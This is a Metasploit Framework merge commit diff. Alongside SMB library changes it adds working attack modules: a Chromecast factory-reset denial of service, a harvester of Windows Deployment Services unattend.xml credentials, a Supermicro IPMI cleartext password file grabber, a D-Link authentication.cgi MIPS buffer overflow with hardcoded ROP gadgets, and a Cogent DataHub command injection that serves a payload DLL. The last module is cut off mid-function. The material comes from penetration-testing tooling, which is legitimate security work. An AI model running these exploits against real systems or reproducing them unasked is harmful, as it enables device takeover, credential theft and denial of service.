Merge branch 'master' into staging/electro-release

bug/bundler_fix
David Maloney 2014-06-26 10:22:30 -05:00
commit 9cec330f05
No known key found for this signature in database
GPG Key ID: DEDBA9DC3A913DB2
13 changed files with 1300 additions and 133 deletions

View File

@ -150,16 +150,64 @@ NTLM_UTILS = Rex::Proto::NTLM::Utils
packet.v['ProcessID'] = self.process_id.to_i
end
# The main dispatcher for all incoming SMB packets
def smb_recv_parse(expected_type, ignore_errors = false)
# Receive a full SMB reply and cache the parsed packet
def smb_recv_and_cache
@smb_recv_cache ||= []
# This will throw an exception if it fails to read the whole packet
data = self.smb_recv
pkt = CONST::SMB_BASE_PKT.make_struct
pkt.from_s(data)
res = pkt
# Store the received packet into the cache
@smb_recv_cache << [ pkt, data, Time.now ]
end
# Scan the packet receive cache for a matching response
def smb_recv_cache_find_match(expected_type)
clean = []
found = nil
@smb_recv_cache.each do |cent|
pkt, data, tstamp = cent
# Return matching packets and mark for removal
if pkt['Payload']['SMB'].v['Command'] == expected_type
found = [pkt,data]
clean << cent
end
# Purge any packets older than 5 minutes
if Time.now.to_i - tstamp.to_i > 300
clean << cent
end
break if found
end
clean.each do |cent|
@smb_recv_cache.delete(cent)
end
found
end
# The main dispatcher for all incoming SMB packets
def smb_recv_parse(expected_type, ignore_errors = false)
pkt = nil
data = nil
# This allows for some leeway when a previous response has not
# been processed but a new request was sent. The old response
# will eventually be timed out of the cache.
1.upto(3) do |attempt|
smb_recv_and_cache
pkt,data = smb_recv_cache_find_match(expected_type)
break if pkt
end
begin
case pkt['Payload']['SMB'].v['Command']
@ -207,15 +255,11 @@ NTLM_UTILS = Rex::Proto::NTLM::Utils
raise XCEPT::InvalidCommand
end
if (pkt['Payload']['SMB'].v['Command'] != expected_type)
raise XCEPT::InvalidType
end
if (ignore_errors == false and pkt['Payload']['SMB'].v['ErrorClass'] != 0)
raise XCEPT::ErrorCode
end
rescue XCEPT::InvalidWordCount, XCEPT::InvalidCommand, XCEPT::InvalidType, XCEPT::ErrorCode
rescue XCEPT::InvalidWordCount, XCEPT::InvalidCommand, XCEPT::ErrorCode
$!.word_count = pkt['Payload']['SMB'].v['WordCount']
$!.command = pkt['Payload']['SMB'].v['Command']
$!.error_code = pkt['Payload']['SMB'].v['ErrorClass']
@ -1837,10 +1881,11 @@ NTLM_UTILS = Rex::Proto::NTLM::Utils
0, # Storage type is zero
].pack('vvvvV') + path + "\x00"
begin
resp = trans2(CONST::TRANS2_FIND_FIRST2, parm, '')
search_next = 0
begin
# Loop until we run out of results
loop do
pcnt = resp['Payload'].v['ParamCount']
dcnt = resp['Payload'].v['DataCount']
poff = resp['Payload'].v['ParamOffset']
@ -1859,13 +1904,15 @@ NTLM_UTILS = Rex::Proto::NTLM::Utils
# search id, search count, end of search, error offset, last name offset
sid, scnt, eos, eoff, loff = resp_parm.unpack('v5')
else
# FINX_NEXT doesn't return a SID
# FIND_NEXT doesn't return a SID
scnt, eos, eoff, loff = resp_parm.unpack('v4')
end
didx = 0
while (didx < resp_data.length)
info_buff = resp_data[didx, 70]
break if info_buff.length != 70
info = info_buff.unpack(
'V'+ # Next Entry Offset
'V'+ # File Index
@ -1881,10 +1928,16 @@ NTLM_UTILS = Rex::Proto::NTLM::Utils
'C'+ # Short File Name Length
'C' # Reserved
)
name = resp_data[didx + 70 + 24, info[15]].sub(/\x00+$/n, '')
files[name] =
name = resp_data[didx + 70 + 24, info[15]]
# Verify that the filename was actually present
break unless name
# Key the file list minus any trailing nulls
files[name.sub(/\x00+$/n, '')] =
{
'type' => ((info[14] & 0x10)==0x10) ? 'D' : 'F',
'type' => ( info[14] & CONST::SMB_EXT_FILE_ATTR_DIRECTORY == 0 ) ? 'F' : 'D',
'attr' => info[14],
'info' => info
}
@ -1892,19 +1945,22 @@ NTLM_UTILS = Rex::Proto::NTLM::Utils
break if info[0] == 0
didx += info[0]
end
last_search_id = sid
last_offset = loff
last_filename = name
if eos == 0 and last_offset != 0 #If we aren't at the end of the search, run find_next
# Exit the search if we reached the end of our results
break if (eos != 0 or last_search_id.nil? or last_offset.to_i == 0)
# If we aren't at the end of the search, run find_next
resp = find_next(last_search_id, last_offset, last_filename)
search_next = 1 # Flip bit so response params will parse correctly
end
end until eos != 0 or last_offset == 0
rescue ::Exception
raise $!
# Flip bit so response params will parse correctly
search_next = 1
end
return files
files
end
# Supplements find_first if file/dir count exceeds max search count
@ -1916,9 +1972,59 @@ NTLM_UTILS = Rex::Proto::NTLM::Utils
260, # Level of interest
resume_key, # Resume key from previous (Last name offset)
6, # Close search if end of search
].pack('vvvVv') + last_filename.to_s + "\x00" # Last filename returned from find_first or find_next
resp = trans2(CONST::TRANS2_FIND_NEXT2, parm, '')
return resp # Returns the FIND_NEXT2 response packet for parsing by the find_first function
].pack('vvvVv') +
last_filename.to_s + # Last filename returned from find_first or find_next
"\x00" # Terminate the file name
# Returns the FIND_NEXT2 response packet for parsing by the find_first function
trans2(CONST::TRANS2_FIND_NEXT2, parm, '')
end
# Recursively search for files matching a regular expression
def file_search(current_path, regex, depth)
depth -= 1
return [] if depth < 0
results = find_first(current_path + "*")
files = []
results.each_pair do |fname, finfo|
# Skip current and parent directory results
next if %W{. ..}.include?(fname)
# Verify the results contain an attribute
next unless finfo and finfo['attr']
if finfo['attr'] & CONST::SMB_EXT_FILE_ATTR_DIRECTORY == 0
# Add any matching files to our result set
files << "#{current_path}#{fname}" if fname =~ regex
else
# Recurse into the discovery subdirectory for more files
begin
search_path = "#{current_path}#{fname}\\"
file_search(search_path, regex, depth).each {|fn| files << fn }
rescue Rex::Proto::SMB::Exceptions::ErrorCode => e
# Ignore common errors related to permissions and non-files
if %W{
STATUS_ACCESS_DENIED
STATUS_NO_SUCH_FILE
STATUS_OBJECT_NAME_NOT_FOUND
STATUS_OBJECT_PATH_NOT_FOUND
}.include? e.get_error(e.error_code)
next
end
$stderr.puts [e, e.get_error(e.error_code), search_path]
raise e
end
end
end
files.uniq
end
# Creates a new directory on the mounted tree
@ -1932,8 +2038,7 @@ NTLM_UTILS = Rex::Proto::NTLM::Utils
attr_accessor :native_os, :native_lm, :encrypt_passwords, :extended_security, :read_timeout, :evasion_opts
attr_accessor :verify_signature, :use_ntlmv2, :usentlm2_session, :send_lm, :use_lanman_key, :send_ntlm
attr_accessor :system_time, :system_zone
#misc
attr_accessor :spnopt # used for SPN
attr_accessor :spnopt
# public read methods
attr_reader :dialect, :session_id, :challenge_key, :peer_native_lm, :peer_native_os
@ -1941,21 +2046,18 @@ NTLM_UTILS = Rex::Proto::NTLM::Utils
attr_reader :multiplex_id, :last_tree_id, :last_file_id, :process_id, :last_search_id
attr_reader :dns_host_name, :dns_domain_name
attr_reader :security_mode, :server_guid
#signing related
attr_reader :sequence_counter,:signing_key, :require_signing
# private methods
# private write methods
attr_writer :dialect, :session_id, :challenge_key, :peer_native_lm, :peer_native_os
attr_writer :default_domain, :default_name, :auth_user, :auth_user_id
attr_writer :dns_host_name, :dns_domain_name
attr_writer :multiplex_id, :last_tree_id, :last_file_id, :process_id, :last_search_id
attr_writer :security_mode, :server_guid
#signing related
attr_writer :sequence_counter,:signing_key, :require_signing
attr_accessor :socket
end
end
end

View File

@ -261,6 +261,23 @@ FILE_FILE_COMPRESSION = 0x00000008
FILE_VOLUME_QUOTAS = 0x00000010
FILE_VOLUME_IS_COMPRESSED = 0x00008000
# SMB_EXT_FILE_ATTR
# http://msdn.microsoft.com/en-us/library/ee878573(prot.20).aspx
SMB_EXT_FILE_ATTR_READONLY = 0x00000001
SMB_EXT_FILE_ATTR_HIDDEN = 0x00000002
SMB_EXT_FILE_ATTR_SYSTEM = 0x00000004
SMB_EXT_FILE_ATTR_DIRECTORY = 0x00000010
SMB_EXT_FILE_ATTR_ARCHIVE = 0x00000020
SMB_EXT_FILE_ATTR_NORMAL = 0x00000080
SMB_EXT_FILE_ATTR_TEMPORARY = 0x00000100
SMB_EXT_FILE_ATTR_COMPRESSED = 0x00000800
SMB_EXT_FILE_POSIX_SEMANTICS = 0x01000000
SMB_EXT_FILE_BACKUP_SEMANTICS = 0x02000000
SMB_EXT_FILE_DELETE_ON_CLOSE = 0x04000000
SMB_EXT_FILE_SEQUENTIAL_SCAN = 0x08000000
SMB_EXT_FILE_RANDOM_ACCESS = 0x10000000
SMB_EXT_FILE_NO_BUFFERING = 0x20000000
SMB_EXT_FILE_WRITE_THROUGH = 0x80000000
# SMB Error Codes
SMB_STATUS_SUCCESS = 0x00000000

View File

@ -505,14 +505,24 @@ module Socket
end
#
# Converts a port specification like "80,21-23,443" into a sorted,
# unique array of valid port numbers like [21,22,23,80,443]
# Converts a port specification like "80,21-25,!24,443" into a sorted,
# unique array of valid port numbers like [21,22,23,25,80,443]
#
def self.portspec_to_portlist(pspec)
ports = []
remove = []
# Build ports array from port specification
pspec.split(/,/).each do |item|
target = ports
item.strip!
if item.start_with? '!'
item.delete! '!'
target = remove
end
start, stop = item.split(/-/).map { |p| p.to_i }
start ||= 0
@ -520,11 +530,15 @@ module Socket
start, stop = stop, start if stop < start
start.upto(stop) { |p| ports << p }
start.upto(stop) { |p| target << p }
end
if ports.empty? and not remove.empty? then
ports = 1.upto 65535
end
# Sort, and remove dups and invalid ports
ports.sort.uniq.delete_if { |p| p < 1 or p > 65535 }
ports.sort.uniq.delete_if { |p| p < 1 or p > 65535 or remove.include? p }
end
#

View File

@ -0,0 +1,58 @@
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit4 < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'Chromecast Factory Reset DoS',
'Description' => %q{
This module performs a factory reset on a Chromecast, causing a denial of service (DoS).
No user authentication is required.
},
'Author' => ['wvu'],
'References' => [
['URL', 'http://www.google.com/intl/en/chrome/devices/chromecast/index.html'] # vendor website
],
'License' => MSF_LICENSE
))
register_options([
Opt::RPORT(8008)
], self.class)
end
def run
res = reset
if res && res.code == 200
print_good('Factory reset performed')
elsif res
print_error("An error occurred: #{res.code} #{res.message}")
end
end
def reset
begin
send_request_raw(
'method' => 'POST',
'uri' => '/setup/reboot',
'agent' => Rex::Text.rand_text_english(rand(42) + 1),
'ctype' => 'application/json',
'data' => '{"params": "fdr"}'
)
rescue Rex::ConnectionRefused, Rex::ConnectionTimeout,
Rex::HostUnreachable => e
fail_with(Failure::Unreachable, e)
ensure
disconnect
end
end
end

View File

@ -17,7 +17,7 @@ class Metasploit4 < Msf::Auxiliary
},
'Author' => ['wvu'],
'References' => [
['URL', 'https://en.wikipedia.org/wiki/Chromecast']
['URL', 'http://www.google.com/intl/en/chrome/devices/chromecast/index.html'] # vendor website
],
'License' => MSF_LICENSE,
'Actions' => [

View File

@ -17,7 +17,7 @@ class Metasploit4 < Msf::Auxiliary
},
'Author' => ['wvu'],
'References' => [
['URL', 'https://en.wikipedia.org/wiki/Chromecast']
['URL', 'http://www.google.com/intl/en/chrome/devices/chromecast/index.html'] # vendor website
],
'License' => MSF_LICENSE
))
@ -38,6 +38,7 @@ class Metasploit4 < Msf::Auxiliary
'PWR',
'ENC',
'CIPHER',
'AUTH',
'ESSID'
],
'SortIndex' => -1
@ -47,26 +48,9 @@ class Metasploit4 < Msf::Auxiliary
waps << [
wap['bssid'],
wap['signal_level'],
case wap['wpa_auth']
when 1
'OPN'
when 5
'WPA'
when 7
'WPA2'
else
wap['wpa_auth']
end,
case wap['wpa_cipher']
when 1
''
when 3
'TKIP'
when 4
'CCMP'
else
wap['wpa_cipher']
end,
enc(wap),
cipher(wap),
auth(wap),
wap['ssid'] + (wap['wpa_id'] ? ' (*)' : '')
]
end
@ -103,4 +87,45 @@ class Metasploit4 < Msf::Auxiliary
end
end
def enc(wap)
case wap['wpa_auth']
when 1
'OPN'
when 2
'WEP'
when 5
'WPA'
when 0, 7
'WPA2'
else
wap['wpa_auth']
end
end
def cipher(wap)
case wap['wpa_cipher']
when 1
''
when 2
'WEP'
when 3
'TKIP'
when 4
'CCMP'
else
wap['wpa_cipher']
end
end
def auth(wap)
case wap['wpa_auth']
when 0
'MGT'
when 5, 7
'PSK'
else
''
end
end
end

View File

@ -0,0 +1,232 @@
#
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'rex/proto/dcerpc'
require 'rex/parser/unattend'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::SMB
include Msf::Exploit::Remote::SMB::Authenticated
include Msf::Exploit::Remote::DCERPC
include Msf::Auxiliary::Report
include Msf::Auxiliary::Scanner
def initialize(info = {})
super(update_info(info,
'Name' => 'Microsoft Windows Deployment Services Unattend Gatherer',
'Description' => %q{
This module will search remote file shares for unattended installation files that may contain
domain credentials. This is often used after discovering domain credentials with the
auxilliary/scanner/dcerpc/windows_deployment_services module or in cases where you already
have domain credentials. This module will connect to the RemInst share and any Microsoft
Deployment Toolkit shares indicated by the share name comments.
},
'Author' => [ 'Ben Campbell <eat_meatballs[at]hotmail.co.uk>' ],
'License' => MSF_LICENSE,
'References' =>
[
[ 'MSDN', 'http://technet.microsoft.com/en-us/library/cc749415(v=ws.10).aspx'],
[ 'URL', 'http://rewtdance.blogspot.co.uk/2012/11/windows-deployment-services-clear-text.html'],
],
))
register_options(
[
Opt::RPORT(445),
OptString.new('SMBDomain', [ false, "SMB Domain", '']),
], self.class)
deregister_options('RHOST', 'CHOST', 'CPORT', 'SSL', 'SSLVersion')
end
# Determine the type of share based on an ID type value
def share_type(val)
stypes = %W{ DISK PRINTER DEVICE IPC SPECIAL TEMPORARY }
stypes[val] || 'UNKNOWN'
end
# Stolen from enumshares - Tried refactoring into simple client, but the two methods need to go in EXPLOIT::SMB and EXPLOIT::DCERPC
# and then the lanman method calls the RPC method. Suggestions where to refactor to welcomed!
def srvsvc_netshareenum
shares = []
handle = dcerpc_handle('4b324fc8-1670-01d3-1278-5a47bf6ee188', '3.0', 'ncacn_np', ["\\srvsvc"])
begin
dcerpc_bind(handle)
rescue Rex::Proto::SMB::Exceptions::ErrorCode => e
print_error("#{rhost} : #{e.message}")
return
end
stubdata =
NDR.uwstring("\\\\#{rhost}") +
NDR.long(1) #level
ref_id = stubdata[0,4].unpack("V")[0]
ctr = [1, ref_id + 4 , 0, 0].pack("VVVV")
stubdata << ctr
stubdata << NDR.align(ctr)
stubdata << [0xffffffff].pack("V")
stubdata << [ref_id + 8, 0].pack("VV")
response = dcerpc.call(0x0f, stubdata)
# Additional error handling and validation needs to occur before
# this code can be moved into a mixin
res = response.dup
win_error = res.slice!(-4, 4).unpack("V")[0]
if win_error != 0
fail_with(Failure::UnexpectedReply, "#{rhost}:#{rport} Win_error = #{win_error.to_i}")
end
# Level, CTR header, Reference ID of CTR
res.slice!(0,12)
share_count = res.slice!(0, 4).unpack("V")[0]
# Reference ID of CTR1
res.slice!(0,4)
share_max_count = res.slice!(0, 4).unpack("V")[0]
if share_max_count != share_count
fail_with(Failure::UnexpectedReply, "#{rhost}:#{rport} share_max_count did not match share_count")
end
# ReferenceID / Type / ReferenceID of Comment
types = res.slice!(0, share_count * 12).scan(/.{12}/n).map{|a| a[4,2].unpack("v")[0]}
share_count.times do |t|
length, offset, max_length = res.slice!(0, 12).unpack("VVV")
if offset != 0
fail_with(Failure::UnexpectedReply, "#{rhost}:#{rport} share offset was not zero")
end
if length != max_length
fail_with(Failure::UnexpectedReply, "#{rhost}:#{rport} share name max length was not length")
end
name = res.slice!(0, 2 * length)
res.slice!(0,2) if length % 2 == 1 # pad
comment_length, comment_offset, comment_max_length = res.slice!(0, 12).unpack("VVV")
if comment_offset != 0
fail_with(Failure::UnexpectedReply, "#{rhost}:#{rport} share comment offset was not zero")
end
if comment_length != comment_max_length
fail_with(Failure::UnexpectedReply, "#{rhost}:#{rport} share comment max length was not length")
end
comment = res.slice!(0, 2 * comment_length)
res.slice!(0,2) if comment_length % 2 == 1 # pad
shares << [ name, share_type(types[t]), comment]
end
shares
end
def run_host(ip)
deploy_shares = []
begin
connect
smb_login
srvsvc_netshareenum.each do |share|
# Ghetto unicode to ascii conversation
share_name = share[0].unpack("v*").pack("C*").split("\x00").first
share_comm = share[2].unpack("v*").pack("C*").split("\x00").first
share_type = share[1]
if share_type == "DISK" && (share_name == "REMINST" || share_comm == "MDT Deployment Share")
vprint_good("#{ip}:#{rport} Identified deployment share #{share_name} #{share_comm}")
deploy_shares << share_name
end
end
deploy_shares.each do |deploy_share|
query_share(deploy_share)
end
rescue ::Interrupt
raise $!
end
end
def query_share(share)
share_path = "\\\\#{rhost}\\#{share}"
vprint_status("#{rhost}:#{rport} Enumerating #{share}...")
begin
simple.connect(share_path)
rescue Rex::Proto::SMB::Exceptions::ErrorCode => e
print_error("#{rhost}:#{rport} Could not access share: #{share} - #{e}")
return
end
results = simple.client.file_search("\\", /unattend.xml$/i, 10)
results.each do |file_path|
file = simple.open(file_path, 'o').read()
next unless file
loot_unattend(file)
creds = parse_client_unattend(file)
creds.each do |cred|
next unless (cred && cred['username'] && cred['password'])
next unless cred['username'].to_s.length > 0
next unless cred['password'].to_s.length > 0
report_creds(cred['domain'].to_s, cred['username'], cred['password'])
print_good("#{rhost}:#{rport} Credentials: " +
"Path=#{share_path}#{file_path} " +
"Username=#{cred['domain'].to_s}\\#{cred['username'].to_s} " +
"Password=#{cred['password'].to_s}"
)
end
end
end
def parse_client_unattend(data)
begin
xml = REXML::Document.new(data)
rescue REXML::ParseException => e
print_error("Invalid XML format")
vprint_line(e.message)
end
Rex::Parser::Unattend.parse(xml).flatten
end
def loot_unattend(data)
return if data.empty?
path = store_loot('windows.unattend.raw', 'text/plain', rhost, data, "Windows Deployment Services")
print_status("#{rhost}:#{rport} Stored unattend.xml in #{path}")
end
def report_creds(domain, user, pass)
report_auth_info(
:host => rhost,
:port => 445,
:sname => 'smb',
:proto => 'tcp',
:source_id => nil,
:source_type => "aux",
:user => "#{domain}\\#{user}",
:pass => pass
)
end
end

View File

@ -0,0 +1,104 @@
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'uri'
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::Scanner
include Msf::Auxiliary::Report
def initialize(info = {})
super(update_info(info,
'Name' => 'Supermicro Onboard IPMI Port 49152 Sensitive File Exposure',
'Description' => %q{
This module abuses a file exposure vulnerability accessible through the web interface
on port 49152 of Supermicro Onboard IPMI controllers. The vulnerability allows an attacker
to obtain detailed device information and download data files containing the clear-text
usernames and passwords for the controller. In May of 2014, at least 30,000 unique IPs
were exposed to the internet with this vulnerability.
},
'Author' =>
[
'Zach Wikholm <kestrel[at]trylinux.us>', # Discovery and analysis
'John Matherly <jmath[at]shodan.io>', # Internet-wide scan
'Dan Farmer <zen[at]fish2.com>', # Additional investigation
'hdm' # Metasploit module
],
'License' => MSF_LICENSE,
'References' =>
[
[ 'URL', 'http://blog.cari.net/carisirt-yet-another-bmc-vulnerability-and-some-added-extras/'],
[ 'URL', 'https://github.com/zenfish/ipmi/blob/master/dump_SM.py']
],
'DisclosureDate' => 'Jun 19 2014'))
register_options(
[
Opt::RPORT(49152)
], self.class)
end
def is_supermicro?
res = send_request_cgi(
{
"uri" => "/IPMIdevicedesc.xml",
"method" => "GET"
})
if res && res.code == 200 && res.body.to_s =~ /supermicro/i
path = store_loot(
'supermicro.ipmi.devicexml',
'text/xml',
rhost,
res.body.to_s,
'IPMIdevicedesc.xml'
)
print_good("#{peer} - Stored the device description XML in #{path}")
return true
else
return false
end
end
def run_host(ip)
unless is_supermicro?
vprint_error("#{peer} - This does not appear to be a Supermicro IPMI controller")
return
end
candidates = %W{ /PSBlock /PSStore /PMConfig.dat /wsman/simple_auth.passwd }
candidates.each do |uri|
res = send_request_cgi(
{
"uri" => uri,
"method" => "GET"
})
next unless res
unless res.code == 200 && res.body.length > 0
vprint_status("#{peer} - Request for #{uri} resulted in #{res.code}")
next
end
path = store_loot(
'supermicro.ipmi.passwords',
'application/octet-stream',
rhost,
res.body.to_s,
uri.split('/').last
)
print_good("#{peer} - Password data from #{uri} stored to #{path}")
end
end
end

View File

@ -9,8 +9,10 @@ require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::Scanner
include Msf::Auxiliary::Report
APP_NAME = "Supermicro web interface"
def initialize(info = {})
@ -23,7 +25,8 @@ class Metasploit3 < Msf::Auxiliary
a valid, but not necessarily administrator-level account, to access the contents of any file
on the system. This includes the /nv/PSBlock file, which contains the cleartext credentials for
all configured accounts. This module has been tested on a Supermicro Onboard IPMI (X9SCL/X9SCM)
with firmware version SMT_X9_214.
with firmware version SMT_X9_214. Other file names to try include /PSStore, /PMConfig.dat, and
/wsman/simple_auth.passwd
},
'Author' =>
[
@ -33,8 +36,8 @@ class Metasploit3 < Msf::Auxiliary
'License' => MSF_LICENSE,
'References' =>
[
#[ 'CVE', '' ],
[ 'URL', 'https://community.rapid7.com/community/metasploit/blog/2013/11/06/supermicro-ipmi-firmware-vulnerabilities' ]
[ 'URL', 'https://community.rapid7.com/community/metasploit/blog/2013/11/06/supermicro-ipmi-firmware-vulnerabilities' ],
[ 'URL', 'https://github.com/zenfish/ipmi/blob/master/dump_SM.py']
],
'DisclosureDate' => 'Nov 06 2013'))
@ -107,7 +110,7 @@ class Metasploit3 < Msf::Auxiliary
end
end
def run
def run_host(ip)
print_status("#{peer} - Checking if it's a #{APP_NAME}....")
if is_supermicro?
print_good("#{peer} - Check successful")
@ -133,7 +136,7 @@ class Metasploit3 < Msf::Auxiliary
file_name = my_basename(datastore['FILEPATH'])
path = store_loot(
'supermicro.ipmi.traversal',
'supermicro.ipmi.traversal.psblock',
'application/octet-stream',
rhost,
contents,

View File

@ -0,0 +1,132 @@
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::CmdStagerEcho
def initialize(info = {})
super(update_info(info,
'Name' => 'D-Link authentication.cgi Buffer Overflow',
'Description' => %q{
This module exploits an remote buffer overflow vulnerability on several D-Link routers.
The vulnerability exists in the handling of HTTP queries to the authentication.cgi with
long password values. The vulnerability can be exploitable without authentication. This
module has been tested successfully on D-Link firmware DIR645A1_FW103B11. Other firmwares
such as the DIR865LA1_FW101b06 and DIR845LA1_FW100b20 are also vulnerable.
},
'Author' =>
[
'Roberto Paleari', # Vulnerability discovery
'Craig Heffner', # also discovered the vulnerability / help with some parts of this module
'Michael Messner <devnull[at]s3cur1ty.de>', # Metasploit module and verification on several other routers
],
'License' => MSF_LICENSE,
'Platform' => ['linux'],
'Arch' => ARCH_MIPSLE,
'References' =>
[
['OSVDB', '95951'],
['EDB', '27283'],
['URL', 'http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10008'], #advisory on vendor web site
['URL', 'http://www.dlink.com/us/en/home-solutions/connect/routers/dir-645-wireless-n-home-router-1000'], #vendor web site of router
['URL', 'http://roberto.greyhats.it/advisories/20130801-dlink-dir645.txt'] #original advisory
],
'Targets' =>
[
[ 'D-Link DIR-645 1.03',
{
'Offset' => 1011,
'LibcBase' => 0x2aaf8000, #Router
#'LibcBase' => 0x40854000, # QEMU environment
'System' => 0x000531FF, # address of system
'CalcSystem' => 0x000158C8, # calculate the correct address of system
'CallSystem' => 0x000159CC, # call our system
}
]
],
'DisclosureDate' => 'Feb 08 2013',
'DefaultTarget' => 0))
end
def check
begin
res = send_request_cgi({
'uri' => "/authentication.cgi",
'method' => 'GET'
})
if res && [200, 301, 302].include?(res.code) && res.body.to_s =~ /status.*uid/
return Exploit::CheckCode::Detected
end
rescue ::Rex::ConnectionError
return Exploit::CheckCode::Unknown
end
Exploit::CheckCode::Unknown
end
def exploit
print_status("#{peer} - Accessing the vulnerable URL...")
unless check == Exploit::CheckCode::Detected
fail_with(Failure::Unknown, "#{peer} - Failed to access the vulnerable URL")
end
print_status("#{peer} - Exploiting...")
execute_cmdstager(
:linemax => 200,
:concat_operator => " && "
)
end
def prepare_shellcode(cmd)
shellcode = rand_text_alpha_upper(target['Offset']) # padding
shellcode << [target['LibcBase'] + target['System']].pack("V") # s0 - address of system
shellcode << rand_text_alpha_upper(16) # unused reg $s1 - $s4
shellcode << [target['LibcBase'] + target['CallSystem']].pack("V") # s5 - second gadget (call system)
# .text:000159CC 10 00 B5 27 addiu $s5, $sp, 0x170+var_160 # get the address of our command into $s5
# .text:000159D0 21 28 60 02 move $a1, $s3 # not used
# .text:000159D4 21 30 20 02 move $a2, $s1 # not used
# .text:000159D8 21 C8 00 02 move $t9, $s0 # $s0 - system
# .text:000159DC 09 F8 20 03 jalr $t9 # call system
# .text:000159E0 21 20 A0 02 move $a0, $s5 # our cmd -> into a0 as parameter for system
shellcode << rand_text_alpha_upper(12) # unused registers $s6 - $fp
shellcode << [target['LibcBase'] + target['CalcSystem']].pack("V") # $ra - gadget nr 1 (prepare the parameter for system)
# .text:000158C8 21 C8 A0 02 move $t9, $s5 # s5 - our second gadget
# .text:000158CC 09 F8 20 03 jalr $t9 # jump the second gadget
# .text:000158D0 01 00 10 26 addiu $s0, 1 # s0 our system address - lets calculate the right address
shellcode << rand_text_alpha_upper(16) # filler in front of our command
shellcode << cmd
end
def execute_command(cmd, opts)
shellcode = prepare_shellcode(cmd)
uid = rand_text_alpha(4)
begin
res = send_request_cgi({
'method' => 'POST',
'uri' => "/authentication.cgi",
'cookie' => "uid=#{uid}",
'encode_params' => false,
'vars_post' => {
'uid' => uid,
'password' => rand_text_alpha(3) + shellcode,
}
})
return res
rescue ::Rex::ConnectionError
fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server")
end
end
end

View File

@ -6,7 +6,7 @@
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
Rank = NormalRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::CmdStagerEcho
@ -15,7 +15,7 @@ class Metasploit3 < Msf::Exploit::Remote
super(update_info(info,
'Name' => 'D-Link hedwig.cgi Buffer Overflow in Cookie Header',
'Description' => %q{
This module exploits an anonymous remote code execution vulnerability on different D-Link
This module exploits an anonymous remote code execution vulnerability on several D-Link
routers. The vulnerability exists in the handling of HTTP queries to the hedwig.cgi with
long value cookies. This module has been tested successfully on D-Link DIR300v2.14, DIR600
and the DIR645A1_FW103B11 firmware.
@ -24,7 +24,7 @@ class Metasploit3 < Msf::Exploit::Remote
[
'Roberto Paleari', # Vulnerability discovery
'Craig Heffner', # also discovered the vulnerability / help with some parts of this exploit
'Michael Messner <devnull[at]s3cur1ty.de>', # Metasploit module and verification on different other routers
'Michael Messner <devnull[at]s3cur1ty.de>', # Metasploit module and verification on several other routers
],
'License' => MSF_LICENSE,
'References' =>
@ -72,7 +72,7 @@ class Metasploit3 < Msf::Exploit::Remote
end
def exploit
print_status("#{peer} - Trying to access the vulnerable URL...")
print_status("#{peer} - Accessing the vulnerable URL...")
unless check == Exploit::CheckCode::Detected
fail_with(Failure::Unknown, "#{peer} - Failed to access the vulnerable URL")

View File

@ -0,0 +1,448 @@
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
# Exploitation is reliable, but the service hangs and needs manual restarting.
Rank = ManualRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::Remote::HttpServer::HTML
include Msf::Exploit::EXE
def initialize
super(
'Name' => 'Cogent DataHub Command Injection',
'Description' => %q{
This module exploits an injection vulnerability in Cogent DataHub prior
to 7.3.5. The vulnerability exists in the GetPermissions.asp page, which
makes insecure use of the datahub_command function with user controlled
data, allowing execution of arbitrary datahub commands and scripts. This
module has been tested successfully with Cogent DataHub 7.3.4 on
Windows 7 SP1.
},
'Author' => [
'John Leitch', # Vulnerability discovery
'juan vazquez' # Metasploit module
],
'Platform' => 'win',
'References' =>
[
['ZDI', '14-136'],
['CVE', '2014-3789'],
['BID', '67486']
],
'Stance' => Msf::Exploit::Stance::Aggressive,
'DefaultOptions' => {
'WfsDelay' => 30,
'InitialAutoRunScript' => 'migrate -f'
},
'Targets' =>
[
[ 'Cogent DataHub < 7.3.5', { } ],
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Apr 29 2014'
)
register_options(
[
OptString.new('URIPATH', [ true, 'The URI to use (do not change)', '/']),
OptPort.new('SRVPORT', [ true, 'The daemon port to listen on ' +
'(do not change)', 80 ]),
OptInt.new('WEBDAV_DELAY', [ true, 'Time that the HTTP Server will ' +
'wait for the payload request', 20]),
OptString.new('UNCPATH', [ false, 'Override the UNC path to use.' ])
], self.class)
end
def autofilter
false
end
def on_request_uri(cli, request)
case request.method
when 'OPTIONS'
process_options(cli, request)
when 'PROPFIND'
process_propfind(cli, request)
when 'GET'
process_get(cli, request)
else
vprint_status("#{request.method} => 404 (#{request.uri})")
resp = create_response(404, "Not Found")
resp.body = ""
resp['Content-Type'] = 'text/html'
cli.send_response(resp)
end
end
def process_get(cli, request)
if blacklisted_path?(request.uri)
vprint_status("GET => 404 [BLACKLIST] (#{request.uri})")
resp = create_response(404, "Not Found")
resp.body = ""
cli.send_response(resp)
return
end
if request.uri.include?(@basename)
print_status("GET => Payload")
return if ((p = regenerate_payload(cli)) == nil)
data = generate_payload_dll({ :code => p.encoded })
send_response(cli, data, { 'Content-Type' => 'application/octet-stream' })
return
end
# Treat index.html specially
if (request.uri[-1,1] == "/" or request.uri =~ /index\.html?$/i)
